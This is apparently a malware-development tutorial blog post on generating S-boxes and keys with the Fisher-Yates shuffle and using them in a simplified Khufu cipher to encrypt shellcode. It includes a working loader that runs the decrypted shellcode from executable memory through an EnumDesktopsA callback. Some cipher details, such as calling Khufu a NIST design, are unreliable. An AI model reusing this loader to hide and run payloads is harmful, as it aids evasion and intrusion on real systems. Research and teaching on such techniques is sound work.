16 minute read

Hello, cybersecurity enthusiasts and white hackers!

cryptography

After reading some of my posts about cryptography, for example this or this, my readers had questions regarding the concepts of sbox generation, so I will decide to continue research cryptography in malware development, and I want to shed light on one of these tricks for generating random sboxes.

This post is the result of my own research on implementing simplest one: Fisher-Yates shuffle trick.

Fisher-Yates

The Fisher-Yates shuffle was first described by Ronald Fisher and Frank Yates in their 1938 book Statistical tables for biological, agricultural, and medical research. Their algorithm description was written on paper with a pencil, and the randomization was provided by a table of integers. The basic approach described for producing a random permutation of the numbers 1–N is as follows:

  • Write down the numbers from 1 to N.
  • Choose a random number k between one and the number of unstruck numbers left (inclusive).
  • Starting from the low end, strike out the kth number that has not yet been struck out and write it down at the conclusion of a separate list.
  • Repeat step 2 until all of the numerals are struck out.
  • The numbers typed down in step 3 are now arranged in a random order.

But what does cryptography have to do with it?

The reliability of some block encryption algorithms depends heavily on how “good” the S-boxes are used in their implementation: the S-box (substitution box) plays a critical role in block cipher cryptography, primarily in providing non-linearity and strengthening the cipher against attacks.

A few words about non-linearity. S-boxes ensure that the relationship between plaintext and ciphertext is non-linear, which is crucial for resisting cryptanalytic attacks such as linear cryptanalysis. Non-linear transformations prevent patterns in the plaintext from being preserved in the ciphertext.

Also, a well-designed S-box contributes to the avalanche effect, where a small change in the plaintext or key leads to significant changes in the ciphertext: this ensures the cipher’s output appears random and makes predicting changes difficult.

In Feistel-based ciphers (e.g., DES), S-boxes transform the output of the Feistel function, ensuring non-linearity before combining with the plaintext.

If we take specific examples of cryptographic algorithms, in SPN-based block ciphers (e.g., AES), the S-box is responsible for replacing input bits with unique output bits, adding confusion to the cryptographic process.

So, as you can see, generating cryptographically secure S-boxes is a complex process involving mathematical techniques to ensure desirable properties like non-linearity, resistance to differential and linear cryptanalysis, and minimal correlation between input and output bits. While I can’t generate truly secure S-boxes within this context, let’s implement this shuffle algorithm based on its original specification.

practical example

Let’s create simple program that implements the Fisher-Yates shuffle to generate a random permutation of sbox[256] and prints the results:

/*
 * hack.c - random sbox generation algorithms.
 * Fisher-Yates shuffle
 * Simple C implementation
 * @cocomelonc
 * https://cocomelonc.github.io/malware/2024/12/16/malware-cryptography-36.html
 */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#define SBOX_SIZE 256

// Fisher-Yates shuffle
void fisher_yates_shuffle(unsigned char *sbox, int size) {
  for (int i = size - 1; i > 0; i--) {
    // generate a random index between 0 and i
    int j = rand() % (i + 1);

    // swap sbox[i] and sbox[j]
    unsigned char temp = sbox[i];
    sbox[i] = sbox[j];
    sbox[j] = temp;
  }
}

int main() {
  unsigned char sbox[SBOX_SIZE];

  // initialize sbox with values 0 to 255
  for (int i = 0; i < SBOX_SIZE; i++) {
    sbox[i] = (unsigned char)i;
  }

  // seed the random number generator with the current time
  srand((unsigned int)time(NULL));

  // shuffle the sbox using Fisher-Yates algorithm
  fisher_yates_shuffle(sbox, SBOX_SIZE);

  // print the shuffled sbox
  printf("generated S-box:\n");
  for (int i = 0; i < SBOX_SIZE; i++) {
    printf("%02x", sbox[i]);
    if ((i + 1) % 16 == 0) {
      printf("\n"); // print a newline every 16 values
    } else {
      printf(" ");
    }
  }

  return 0;
}

First of all, sbox array is initialized with values from 0 to 255.

Fisher-Yates shuffle: Iterates backward through the array. Selects a random index j in the range [0, i]. Finally, swaps the elements at indices i and j.
Randomness: The rand() function is seeded with the current time using srand(time(NULL)) to ensure different results each time the program is run.
Output: The shuffled S-Box is printed in a readable format, with 16 values per line.

I also add Windows version, just add WinAPI header:

/*
 * hack.c - random sbox generation algorithms.
 * Fisher-Yates shuffle
 * Simple C implementation
 * @cocomelonc
 * https://cocomelonc.github.io/malware/2024/12/16/malware-cryptography-36.html
 */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <windows.h>

#define SBOX_SIZE 256

// Fisher-Yates shuffle
void fisher_yates_shuffle(unsigned char *sbox, int size) {
  for (int i = size - 1; i > 0; i--) {
    // generate a random index between 0 and i
    int j = rand() % (i + 1);

    // swap sbox[i] and sbox[j]
    unsigned char temp = sbox[i];
    sbox[i] = sbox[j];
    sbox[j] = temp;
  }
}

int main() {
  unsigned char sbox[SBOX_SIZE];

  // initialize sbox with values 0 to 255
  for (int i = 0; i < SBOX_SIZE; i++) {
    sbox[i] = (unsigned char)i;
  }

  // seed the random number generator with the current time
  srand((unsigned int)time(NULL));

  // shuffle the sbox using Fisher-Yates algorithm
  fisher_yates_shuffle(sbox, SBOX_SIZE);

  // print the shuffled sbox
  printf("generated S-box:\n");
  for (int i = 0; i < SBOX_SIZE; i++) {
    printf("%02x", sbox[i]);
    if ((i + 1) % 16 == 0) {
      printf("\n"); // print a newline every 16 values
    } else {
      printf(" ");
    }
  }

  return 0;
}

demo

Compile it for linux:

gcc -o hack hack.c

cryptography

or for Windows:

x86_64-w64-mingw32-g++ hack2.c -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

cryptography

When you run the program, the output will look like this (on my Linux machine, values will vary due to randomness):

cryptography

As you can see, everything is worked perfectly! =^..^=

Random S-boxes in cryptography algorithms

Which ciphers can use randomly generated S-boxes?

For example, Khufu (1989, NIST) designed with a customizable S-box for key-dependent substitution and suitable for random S-boxes: Khufu was specifically designed to use user-generated or random S-boxes.

Lucifer (1971) designed with static S-boxes but could be modified to use random S-boxes.

RC5 and CAST-128: Flexible designs that allow integration of S-boxes with minor adjustments.

practical example 3

Let’s integrate Fisher-Yates shuffle to my Khufu payload encryption implementation.

Original code from my post:

/*
* hack.c
* encrypt/decrypt payload 
* via Khufu algorithm
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2024/07/21/malware-cryptography-30.html
*/
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

#define ROUNDS 16
#define BLOCK_SIZE 8
#define KEY_SIZE 64

uint8_t key[KEY_SIZE] = {
  0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
  0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F,
  0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
  0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F,
  0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27,
  0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F,
  0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
  0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F
};

uint32_t sbox[256];

void khufu_generate_sbox(uint8_t *key, int round) {
  for (int i = 0; i < 256; i++) {
    sbox[i] = (key[(round * 8 + i) % KEY_SIZE] << 24) |
          (key[(round * 8 + i + 1) % KEY_SIZE] << 16) |
          (key[(round * 8 + i + 2) % KEY_SIZE] << 8) |
          key[(round * 8 + i + 3) % KEY_SIZE];
  }
}

void khufu_encrypt(uint8_t *block, uint8_t *key) {
  uint32_t left = ((uint32_t)block[0] << 24) | ((uint32_t)block[1] << 16) | ((uint32_t)block[2] << 8) | (uint32_t)block[3];
  uint32_t right = ((uint32_t)block[4] << 24) | ((uint32_t)block[5] << 16) | ((uint32_t)block[6] << 8) | (uint32_t)block[7];

  left ^= ((uint32_t)key[0] << 24) | ((uint32_t)key[1] << 16) | ((uint32_t)key[2] << 8) | (uint32_t)key[3];
  right ^= ((uint32_t)key[4] << 24) | ((uint32_t)key[5] << 16) | ((uint32_t)key[6] << 8) | (uint32_t)key[7];

  for (int round = 0; round < ROUNDS; round++) {
    khufu_generate_sbox(key, round);
    uint32_t temp = left;
    left = right ^ sbox[left & 0xFF];
    right = (temp >> 8) | (temp << 24);
    uint32_t temp2 = left;
    left = right;
    right = temp2;
  }

  left ^= ((uint32_t)key[8] << 24) | ((uint32_t)key[9] << 16) | ((uint32_t)key[10] << 8) | (uint32_t)key[11];
  right ^= ((uint32_t)key[12] << 24) | ((uint32_t)key[13] << 16) | ((uint32_t)key[14] << 8) | (uint32_t)key[15];

  block[0] = (left >> 24) & 0xFF;
  block[1] = (left >> 16) & 0xFF;
  block[2] = (left >> 8) & 0xFF;
  block[3] = left & 0xFF;
  block[4] = (right >> 24) & 0xFF;
  block[5] = (right >> 16) & 0xFF;
  block[6] = (right >> 8) & 0xFF;
  block[7] = right & 0xFF;
}

void khufu_decrypt(uint8_t *block, uint8_t *key) {
  uint32_t left = ((uint32_t)block[0] << 24) | ((uint32_t)block[1] << 16) | ((uint32_t)block[2] << 8) | (uint32_t)block[3];
  uint32_t right = ((uint32_t)block[4] << 24) | ((uint32_t)block[5] << 16) | ((uint32_t)block[6] << 8) | (uint32_t)block[7];

  left ^= ((uint32_t)key[8] << 24) | ((uint32_t)key[9] << 16) | ((uint32_t)key[10] << 8) | (uint32_t)key[11];
  right ^= ((uint32_t)key[12] << 24) | ((uint32_t)key[13] << 16) | ((uint32_t)key[14] << 8) | (uint32_t)key[15];

  for (int round = ROUNDS - 1; round >= 0; round--) {
    uint32_t temp = right;
    right = left ^ sbox[right & 0xFF];
    left = (temp << 8) | (temp >> 24);
    uint32_t temp2 = left;
    left = right;
    right = temp2;
  }

  left ^= ((uint32_t)key[0] << 24) | ((uint32_t)key[1] << 16) | ((uint32_t)key[2] << 8) | (uint32_t)key[3];
  right ^= ((uint32_t)key[4] << 24) | ((uint32_t)key[5] << 16) | ((uint32_t)key[6] << 8) | (uint32_t)key[7];

  block[0] = (left >> 24) & 0xFF;
  block[1] = (left >> 16) & 0xFF;
  block[2] = (left >> 8) & 0xFF;
  block[3] = left & 0xFF;
  block[4] = (right >> 24) & 0xFF;
  block[5] = (right >> 16) & 0xFF;
  block[6] = (right >> 8) & 0xFF;
  block[7] = right & 0xFF;
}

void khufu_encrypt_shellcode(unsigned char* shellcode, int shellcode_len) {
  int i;
  for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
    khufu_encrypt(shellcode + i * BLOCK_SIZE, key);
  }
  // check if there are remaining bytes
  int remaining = shellcode_len % BLOCK_SIZE;
  if (remaining != 0) {
  unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
  memcpy(pad, shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, remaining);
  khufu_encrypt(pad, key);
  memcpy(shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, pad, remaining);
  }
}

void khufu_decrypt_shellcode(unsigned char* shellcode, int shellcode_len) {
  int i;
  for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
    khufu_decrypt(shellcode + i * BLOCK_SIZE, key);
  }
  // check if there are remaining bytes
  int remaining = shellcode_len % BLOCK_SIZE;
  if (remaining != 0) {
  unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
  memcpy(pad, shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, remaining);
  khufu_decrypt(pad, key);
  memcpy(shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, pad, remaining);
  }
}

int main() {
  unsigned char my_payload[] = 
  "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
  "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
  "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
  "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
  "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
  "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
  "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
  "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
  "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
  "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
  "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
  "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
  "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
  "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
  "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
  "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
  "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
  "\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
  "\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
  "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
  "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
  "\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
  "\x2e\x2e\x5e\x3d\x00";

  int my_payload_len = sizeof(my_payload);
  int pad_len = my_payload_len + (8 - my_payload_len % 8) % 8;
  unsigned char padded[pad_len];
  memset(padded, 0x90, pad_len);
  memcpy(padded, my_payload, my_payload_len);

  printf("original shellcode: ");
  for (int i = 0; i < my_payload_len; i++) {
    printf("%02x ", my_payload[i]);
  }
  printf("\n\n");

  khufu_encrypt_shellcode(padded, pad_len);

  printf("encrypted shellcode: ");
  for (int i = 0; i < pad_len; i++) {
    printf("%02x ", padded[i]);
  }
  printf("\n\n");

  khufu_decrypt_shellcode(padded, pad_len);

  printf("decrypted shellcode: ");
  for (int i = 0; i < my_payload_len; i++) {
    printf("%02x ", padded[i]);
  }

  printf("\n\n");

  LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  RtlMoveMemory(mem, padded, my_payload_len);
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
  return 0;
}

We can add our random algorithm for key generation. Instead of using a predefined static key, the we can use a random key generated via Fisher-Yates Shuffle:

// Fisher-Yates shuffle
void fisher_yates_shuffle(unsigned char *sbox, int size) {
  for (int i = size - 1; i > 0; i--) {
    // generate a random index between 0 and i
    int j = rand() % (i + 1);

    // swap sbox[i] and sbox[j]
    unsigned char temp = sbox[i];
    sbox[i] = sbox[j];
    sbox[j] = temp;
  }
}

void khufu_generate_key() {
  // initialize key with values 0 to 64
  for (int i = 0; i < KEY_SIZE; i++) {
    key[i] = (unsigned char)i;
  }

  // seed the random number generator with the current time
  srand((unsigned int)time(NULL));

  // shuffle the key using Fisher-Yates algorithm
  fisher_yates_shuffle(key, KEY_SIZE);
}

As you can see, the key starts as an array of values 0x00 to 0x3F (0-63 in hexadecimal) and gets shuffled randomly. This ensures that the key is unique for each execution of the program.

So updated full source code looks like this (hack3.c):

/*
* hack.c
* encrypt/decrypt payload 
* via Khufu algorithm
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2024/07/21/malware-cryptography-30.html
*/
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
// #include <windows.h>

#define ROUNDS 16
#define BLOCK_SIZE 8
#define KEY_SIZE 64

uint8_t key[KEY_SIZE] = {
  0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
  0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F,
  0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
  0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F,
  0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27,
  0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F,
  0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
  0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F
};

uint32_t sbox[256];

// Fisher-Yates shuffle
void fisher_yates_shuffle(unsigned char *sbox, int size) {
  for (int i = size - 1; i > 0; i--) {
    // generate a random index between 0 and i
    int j = rand() % (i + 1);

    // swap sbox[i] and sbox[j]
    unsigned char temp = sbox[i];
    sbox[i] = sbox[j];
    sbox[j] = temp;
  }
}

void khufu_generate_key() {
  // initialize key with values 0 to 64
  for (int i = 0; i < KEY_SIZE; i++) {
    key[i] = (unsigned char)i;
  }

  // seed the random number generator with the current time
  srand((unsigned int)time(NULL));

  // shuffle the key using Fisher-Yates algorithm
  fisher_yates_shuffle(key, KEY_SIZE);
}

void khufu_generate_sbox(uint8_t *key, int round) {
  for (int i = 0; i < 256; i++) {
    sbox[i] = (key[(round * 8 + i) % KEY_SIZE] << 24) |
          (key[(round * 8 + i + 1) % KEY_SIZE] << 16) |
          (key[(round * 8 + i + 2) % KEY_SIZE] << 8) |
          key[(round * 8 + i + 3) % KEY_SIZE];
  }
}

void khufu_encrypt(uint8_t *block, uint8_t *key) {
  uint32_t left = ((uint32_t)block[0] << 24) | ((uint32_t)block[1] << 16) | ((uint32_t)block[2] << 8) | (uint32_t)block[3];
  uint32_t right = ((uint32_t)block[4] << 24) | ((uint32_t)block[5] << 16) | ((uint32_t)block[6] << 8) | (uint32_t)block[7];

  left ^= ((uint32_t)key[0] << 24) | ((uint32_t)key[1] << 16) | ((uint32_t)key[2] << 8) | (uint32_t)key[3];
  right ^= ((uint32_t)key[4] << 24) | ((uint32_t)key[5] << 16) | ((uint32_t)key[6] << 8) | (uint32_t)key[7];

  for (int round = 0; round < ROUNDS; round++) {
    khufu_generate_sbox(key, round);
    uint32_t temp = left;
    left = right ^ sbox[left & 0xFF];
    right = (temp >> 8) | (temp << 24);
    uint32_t temp2 = left;
    left = right;
    right = temp2;
  }

  left ^= ((uint32_t)key[8] << 24) | ((uint32_t)key[9] << 16) | ((uint32_t)key[10] << 8) | (uint32_t)key[11];
  right ^= ((uint32_t)key[12] << 24) | ((uint32_t)key[13] << 16) | ((uint32_t)key[14] << 8) | (uint32_t)key[15];

  block[0] = (left >> 24) & 0xFF;
  block[1] = (left >> 16) & 0xFF;
  block[2] = (left >> 8) & 0xFF;
  block[3] = left & 0xFF;
  block[4] = (right >> 24) & 0xFF;
  block[5] = (right >> 16) & 0xFF;
  block[6] = (right >> 8) & 0xFF;
  block[7] = right & 0xFF;
}

void khufu_decrypt(uint8_t *block, uint8_t *key) {
  uint32_t left = ((uint32_t)block[0] << 24) | ((uint32_t)block[1] << 16) | ((uint32_t)block[2] << 8) | (uint32_t)block[3];
  uint32_t right = ((uint32_t)block[4] << 24) | ((uint32_t)block[5] << 16) | ((uint32_t)block[6] << 8) | (uint32_t)block[7];

  left ^= ((uint32_t)key[8] << 24) | ((uint32_t)key[9] << 16) | ((uint32_t)key[10] << 8) | (uint32_t)key[11];
  right ^= ((uint32_t)key[12] << 24) | ((uint32_t)key[13] << 16) | ((uint32_t)key[14] << 8) | (uint32_t)key[15];

  for (int round = ROUNDS - 1; round >= 0; round--) {
    uint32_t temp = right;
    right = left ^ sbox[right & 0xFF];
    left = (temp << 8) | (temp >> 24);
    uint32_t temp2 = left;
    left = right;
    right = temp2;
  }

  left ^= ((uint32_t)key[0] << 24) | ((uint32_t)key[1] << 16) | ((uint32_t)key[2] << 8) | (uint32_t)key[3];
  right ^= ((uint32_t)key[4] << 24) | ((uint32_t)key[5] << 16) | ((uint32_t)key[6] << 8) | (uint32_t)key[7];

  block[0] = (left >> 24) & 0xFF;
  block[1] = (left >> 16) & 0xFF;
  block[2] = (left >> 8) & 0xFF;
  block[3] = left & 0xFF;
  block[4] = (right >> 24) & 0xFF;
  block[5] = (right >> 16) & 0xFF;
  block[6] = (right >> 8) & 0xFF;
  block[7] = right & 0xFF;
}

void khufu_encrypt_shellcode(unsigned char* shellcode, int shellcode_len) {
  int i;
  for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
    khufu_encrypt(shellcode + i * BLOCK_SIZE, key);
  }
  // check if there are remaining bytes
  int remaining = shellcode_len % BLOCK_SIZE;
  if (remaining != 0) {
  unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
  memcpy(pad, shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, remaining);
  khufu_encrypt(pad, key);
  memcpy(shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, pad, remaining);
  }
}

void khufu_decrypt_shellcode(unsigned char* shellcode, int shellcode_len) {
  int i;
  for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
    khufu_decrypt(shellcode + i * BLOCK_SIZE, key);
  }
  // check if there are remaining bytes
  int remaining = shellcode_len % BLOCK_SIZE;
  if (remaining != 0) {
  unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
  memcpy(pad, shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, remaining);
  khufu_decrypt(pad, key);
  memcpy(shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, pad, remaining);
  }
}

int main() {
  khufu_generate_key();
  printf("generated key:\n");
  for (int i = 0; i < KEY_SIZE; i++) {
    printf("%02x", key[i]);
    if ((i + 1) % 8 == 0) {
      printf("\n"); // print a newline every 16 values
    } else {
      printf(" ");
    }
  }
  unsigned char my_payload[] = 
  "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
  "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
  "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
  "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
  "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
  "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
  "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
  "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
  "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
  "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
  "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
  "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
  "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
  "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
  "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
  "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
  "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
  "\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
  "\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
  "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
  "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
  "\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
  "\x2e\x2e\x5e\x3d\x00";

  int my_payload_len = sizeof(my_payload);
  int pad_len = my_payload_len + (8 - my_payload_len % 8) % 8;
  unsigned char padded[pad_len];
  memset(padded, 0x90, pad_len);
  memcpy(padded, my_payload, my_payload_len);

  printf("original shellcode: ");
  for (int i = 0; i < my_payload_len; i++) {
    printf("%02x ", my_payload[i]);
  }
  printf("\n\n");

  khufu_encrypt_shellcode(padded, pad_len);

  printf("encrypted shellcode: ");
  for (int i = 0; i < pad_len; i++) {
    printf("%02x ", padded[i]);
  }
  printf("\n\n");

  khufu_decrypt_shellcode(padded, pad_len);

  printf("decrypted shellcode: ");
  for (int i = 0; i < my_payload_len; i++) {
    printf("%02x ", padded[i]);
  }

  printf("\n\n");

//   LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//   RtlMoveMemory(mem, padded, my_payload_len);
//   EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
  return 0;
}

As usually I used meow-meow messagebox payload in this code.

demo 2

Compile it (comment WinAPI functions and headers):

gcc -o hack3 hack3.c

For demo purposes, run it on my linux machine:

./hack3

cryptography

Encryption key changes every time the program is run:

cryptography

cryptography

demo 3

Uncomment WinAPI functions, compile for run payload:

x86_64-w64-mingw32-g++ hack4.c -o hack4.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

cryptography

As you can see, everything is worked perfectly! =^..^=

To another trick for integration Fisher-Yates shuffle into my Khufu implementation for generating a random S-box, we can replace the deterministic khufu_generate_sbox function with a new implementation that uses a shuffled S-box. Here’s how we can modify our code step by step:

  • Implement the Fisher-Yates algorithm to shuffle the sbox array.
  • Replace the deterministic S-Box generation logic with the Fisher-Yates shuffle to generate a random permutation of the S-Box for each round.
  • Use srand(time(NULL)) or any cryptographically secure RNG to ensure randomness for research purposes.

final words

The S-box is the heart of many block ciphers, providing the critical confusion component required to secure encryption. A poorly designed or predictable S-box can render a cipher vulnerable to attacks, while a strong S-box ensures robustness and resistance against advanced cryptanalysis.

I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting shuffle technique, and adds a weapon to the red teamers arsenal.

Fisher-Yates_shuffle
Malware and cryptography 1
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine